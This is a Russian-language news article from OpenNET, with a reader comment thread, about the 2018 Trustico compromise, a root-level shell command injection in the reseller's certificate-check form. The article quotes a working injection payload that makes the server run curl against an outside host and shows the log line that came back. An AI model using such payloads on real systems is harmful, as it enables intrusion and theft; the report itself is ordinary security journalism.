The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера

02.03.2018 09:05

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки "$(curl http://1.2.3.4/`id`)" на хост 1.2.3.4 придёт запрос вида:


   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico выведен из строя и недоступен. Пока непонятно позволял ли взломанный сервер получить доступ к архиву закрытых ключей клиентских сертификатов, но до выключения сервера одному из экспериментаторов удалось найти в конфигурации web-сервера закрытый ключ для SSL-сертификата домена "*.trustico.com", который хранился на скомпрометированном сервере.

Проблема также затронула партнёрский сайт SSLDirect.com, который размещался на том же сервере, и генерировал сертификаты через Trustico, характеризуя данную компанию как одного из ведущих мировых центров сертификации ("Trustico is one of the worlds leading SSL Certificate issuers").

Представители удостоверяющих центров DigiCert и Comodo, которые выступали в роли партнёров Trustico, пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва всех выданных через Trustico сертификатов в течение 24 часов. При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

  1. Главная ссылка к новости (https://www.reddit.com/r/sysad...)
  2. OpenNews: 23 тысячи SSL-сертификатов будут отозваны из-за инцидента в Trustico
  3. OpenNews: Поставлена под сомнение валидность 30 тысяч HTTPS-сертификатов удостоверяющего центра Symantec
  4. OpenNews: Symantec продаёт удостоверяющий центр компании DigiCert
  5. OpenNews: Вступили в силу требования к удостоверяющим центрам по проверке CAA-записей в DNS
  6. OpenNews: Let's Encrypt занял 36% рынка удостоверяющих центров
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: trustico, ca, cert
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (51) Ajax | 1 уровень | Линейный | Раскрыть всё | RSS
  • 1.1, Аноним (-), 09:18, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +30 +/
    Что вы делаете, прекратите! Я попкорн уже не успеваю из аргентины подвозить
     
     
  • 2.23, user (??), 12:27, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Из аргентинской муки нужно делать блины на лопате.
     

  • 1.2, Аноним (-), 09:19, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "Гори-гори ясно, чтобы не погасло!"
     
     
  • 2.5, Аноним (-), 09:24, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > "Гори-гори ясно, чтобы не погасло!"

    Earth, Wind & Fire - Boogie Wonderland
    Scooter - Fire

     
  • 2.22, Аноним (-), 12:21, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    The roof
    The roof
    The roof is on fire
    We don't need no water
    Let the motherfucker burn
    Burn, motherfucker, burn(C)
     

  • 1.3, Аноним (-), 09:22, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    урок коррупционерам
     
     
  • 2.11, Аноним (-), 10:15, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    я Вас умоляю, просто подкорректируют планы безотносительно к сути происшествия
     
     
  • 3.18, Аноним (-), 11:07, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    разумеется, на пути жадности нет преград
     
  • 2.44, Michael Shigorin (ok), 10:52, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • –5 +/
    > урок коррупционерам

    Это Вы про тот почтовый сервер Хиллари?

     
     
  • 3.47, Аноним (-), 13:28, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Всем кто смеет хреново работать и раздолбайствовать.
     
     
  • 4.54, Dmitry77 (ok), 00:35, 04/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Ну как сказать.. хреново работает - тот кто принимает стандарты. Например DNS. Сертификаты - это  заплатка которая плохо держится.
     
  • 3.48, Аноним (-), 13:42, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, про получателей отката от комода за переход к ним с дигисерта. Такое впечатление, что их в яслях или в школе врать не научили, и они наивно полагали, что просто так можно краденные серты предъявить.
     

  • 1.4, A.Stahl (ok), 09:23, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Ну облажались. Бывает. Trustico это маленький посредник. Возможно там в штате 1 человек, он же хозяин-администратор-программист. Совершенно обычная ситуация. Ничего нового.
     
  • 1.6, commiethebeastie (ok), 09:25, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >http://1.2.3.4/'id'

    CVSS 11?

     
  • 1.8, Аноним (-), 09:26, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные, но так как хорошие разработчики это ленивые, нетерпеливые, с завышенным самомнением, персонажи, то остаются только студенты и индусы.
     
     
  • 2.13, angra (ok), 10:34, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +5 +/
    >Это бич IT, в энтерпрайз нужны внимательные, трудолюбивые и скромные

    А деньги есть только на студентов и индусов, так как почти все средства уходят на бонусы манагеров.

     
     
  • 3.34, Аноним (-), 18:42, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Так снесите Бастилию )
     
  • 2.17, Аноним (-), 11:04, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > внимательные, трудолюбивые и скромные

    послушные, согласные, умеющие в минимум полезных действий, внимание и трудолюбие ведут к убыткам

     
     
  • 3.24, Аноним (-), 12:32, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > внимание и трудолюбие ведут к убыткам

    В стартапах, да. В энтерпрайзе наоборот.

     
  • 2.27, Аноним (-), 13:05, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    проблема в тех кто платит, не принёс новую звёздную идею - не достоин хорошего дохода.
    как итог постепенно вся кропотливая работа сваливается на наиболее адекватного в условном отделе, а в какой-то момент он либо устаёт, либо просто уходит...
     

  • 1.9, Аноним (-), 09:28, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Уволенный из Equifax администратор, перешёл на работу в Trustico?
     
     
  • 2.10, нах (?), 09:52, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –3 +/
    уволенный поехал обратно в свою деревню под Бангалором, в трех тапках - два на ногах, один в жопе, проблема в том, что их в той деревне пол-миллиона, и треть уехали в Штаты по очень мягким визовым правилам. (вторая треть уехала в Европы с ближними Азиями)
    тапок не хватит.
     
     
  • 3.45, mickvav (?), 11:18, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Вы так говорите, как будто чувак из мухосранска не мог админить оносайтик...
     

  • 1.15, Аноним (-), 10:37, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    > Представители удостоверяющего центра DigiCert и других партнёров Trustico пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва все выданных через Trustico сертификатов в течение 24 часов.

    И не отреагируют, сколько мы ни будем ожидать.

     
  • 1.16, Аноним (-), 10:47, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

    И мы конечно верим им на слово, да? Учитывая что во всем остальном они врали как сивый мерин и скрывали информацию до последнего.

     
     
  • 2.19, Аноним (-), 11:12, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > И мы конечно верим им на слово, да?

    Я думаю, что эта фраза в конце новости подается просто для особого смака.

     
  • 2.20, Аноним (-), 11:27, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    в выигрыше остались те, кто доверился малозащищенному реселлеру - все они узнали, что скомпрометированы с приемлимой задержкой в границах TTT(time to trust).
     

  • 1.21, Zlo (??), 11:40, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач у всех остальных сертификаторов......прям совпадение.....
     
     
  • 2.25, Аноним (-), 12:47, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Не думаю
     
  • 2.26, Аноним (-), 12:57, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    А сам letsencrypt можно рассматривать как монокультуру...
     
  • 2.49, Аноним (-), 13:44, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > Вот даже интересно после появление Let's Encrypt пошла какая то полоса неудач
    > у всех остальных сертификаторов......прям совпадение.....

    Это не совпадение, а следствие: комод теряет доход и пытается подмять остатки бизнеса на платных сертификатах.

     

  • 1.28, Дуплик (ok), 13:40, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.
     
     
  • 2.29, Дудосер (?), 14:15, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    А за щеку откладывать можно будет?
     
  • 2.30, Некто (??), 14:16, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Когда уже сделают принципиально новый HTTPSSS на блокчейне? HTTPS абсолютно несекьюрный.

    Ага! И все браузеры, использующие "HTTPSSS на блокчейне", в свободное время будут майнить не Monero, а подписи к транзакциям в этом блокчейне. Правильно! К чему столько вычислительной мощности CPU простаивает!

     
     
  • 3.31, ананас (?), 14:27, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Да и ещё выкачивать уже подписанные сертификаты чтобы проверять локально
     
  • 3.35, Диалектик (?), 18:58, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем самостоятельно что-то майнить? Вон возьми тот же блокчейн namecoin и используй нахаляву.
     
  • 2.41, Аноним (-), 08:11, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    но ведь namecoin уже есть.
     

  • 1.32, mumu (ok), 16:54, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    > передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.

    #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной школы имеет под собой серьёзные аргументы.

     
     
  • 2.33, Некто (??), 17:10, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +3 +/
    >> передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов.
    > #$%^&*! Всё же запрет на пользование интернетом хотя бы до окончания начальной
    > школы имеет под собой серьёзные аргументы.

    А еще "... они будут исполнены на сервере с правами root", что однозначно указывает, что их веб сервер работал под рутом!

    Запрет на пользование интернетом до окончания начальной школы от таких уродов не спасет. Нужна юридическая норма на пожизненный запрет пользования компьютером.

     
     
  • 3.36, Аноним (-), 19:23, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    если форенсик сможет с убедительной вероятностью указать на конкретное лицо, с которым не будет некоторого рода проблем. а уж запрет пользования..
     

  • 1.37, кек (?), 21:31, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    >Суть  выявленной уязвимости в передаче пользовательского ввода в обработчик на  shell без экранирования спецсимволов

    шел 2018 год...

     
  • 1.38, Аноним (-), 22:23, 02/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Где то видел статью о том что дешевле быть взломанным чем тратить деньги на грамотных специалистов. Такова селяви
     
     
  • 2.39, Аноним (-), 23:10, 02/03/2018 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Дешевле не значит выгоднее.
     
  • 2.40, Аноним (-), 00:17, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Еще дешевле вообще не заморачиваться с сайтами, не делать их вообще. Расходов ровно 0. Заодно и не сломают.
     
  • 2.42, Ordu (ok), 08:45, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Поэтому сейчас в США даже республиканцы задумываются о том, что сфера IT требует большего регулирования со стороны государства. Чтобы быть взломанным было бы дороже.
     
     
  • 3.43, Аноним (-), 09:36, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    никто не застрахован от ошибок, можно учиться жить без компьютера, пока регулятор не утянул всех под лёд
     
  • 3.53, Аноним (-), 18:07, 03/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    непонял, это как: "запретить взламывать" или "запретить быть взламываемыми"?
     

  • 1.46, Тот_Самый_Анонимус (?), 11:41, 03/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    В общем, сам принцип доверенных сертификатов пошёл по песде. Набуя вообще эти списки доверенных по умолчанию? Пусть каждый сам решает кому доверять, или ставит дополнение, которое решает за него.
     
  • 1.52, Kuromi (ok), 17:42, 03/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка - в мае.
    Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов на затронутых сайтах, наконец-то.
     
     
  • 2.55, Kuromi (ok), 06:05, 05/03/2018 [^] [^^] [^^^] [ответить]  
  • +/
    > А в это время в Firefox Nightly уже (временно) выключили блокирование сертификатов
    > от Symantec - слишком уж много сайтов поломалось. Подождут пока сиуация
    > не стабилизируется, все таки релиз ФФ60 в котормо будет эта блокировка
    > - в мае.
    > Хорошая новость же что некоторые слоупоки-админы все таки начали обновление сертификатов
    > на затронутых сайтах, наконец-то.

    И, само смешное, спустя пару дней включили назад.

     

  • 1.56, Аноним (-), 03:23, 06/03/2018 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Прекрасно! Находил такие дыры лет 12 назад много где, но не думал, что такое до сих пор встречается в чем-то серьезнее курсовых работ. :)

    Самое удивительное, что сэкономили на разработчиках те, у кого вообще затрат на ведение бизнеса почти по нулям - даже не продажа, а перепродажа воздуха. Жадность человеческая не имеет предела.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    MIRhosting
    Inferno Solutions
    Hosting by Ihor
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2019 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру